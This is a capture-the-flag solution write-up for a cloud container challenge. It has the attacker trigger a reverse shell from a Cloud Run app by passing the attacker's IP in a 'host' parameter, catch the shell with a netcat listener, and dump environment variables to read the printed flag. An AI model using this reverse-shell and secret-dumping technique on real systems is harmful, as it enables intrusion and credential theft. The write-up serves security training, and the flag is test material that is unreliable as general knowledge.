Running in the Clouds - Solution

Introduction

William Swordsworth, the modern day Container hacker/poet wants you to compromise a container that he has set up containing a secret. He promises lots of head breaking, out of the box thinking, packet inspection and swearing.

Starting point

  1. The container is has a public endpoint - https://ctfcloudrun-sz2ttebtva-uc.a.run.app.

Your task

  1. Read the flag in the env of the container.

Walkthrough

  1. From the poem, identify the variable name to be passed to the web application. Trying some combinations reveal that the parameter is host.

  2. Open all ports on the Security Group for the attacker machine

  3. Since we don't know what port the reverse shell will connect back to, we need to run tcpdump and see which port receives a TCP RST packet. On the attacker machine in a new terminal run the following tcpdump command

tcpdump -ni eth0 -s 1500 port not 22 and port not 53 and not port 443 and not arp

  1. While tcpdump is running, access the cloud run web app and notice the port number the Cloud Run is trying to connect to.

  2. Run a netcat listener on port 6945 - nc -nlvp 6945.

  3. Make the web request with the public URL of the app and pass the cloud attacker machine IP as a parameter to the Cloud Run as Cloud Run app and pass the IP of the attacker machine via a GET parameter called host.

Example: https://ctfcloudrun-sz2ttebtva-uc.a.run.app/?host=<attacker-ip>

  1. From the reverse shell, dump the environment variables which contains the flag.

  2. The flag is POET_INSIDE_HACKER_OUTSIDE.

PreviousAt Your Service - SolutionNextAMI not worthy? - Solution

Last updated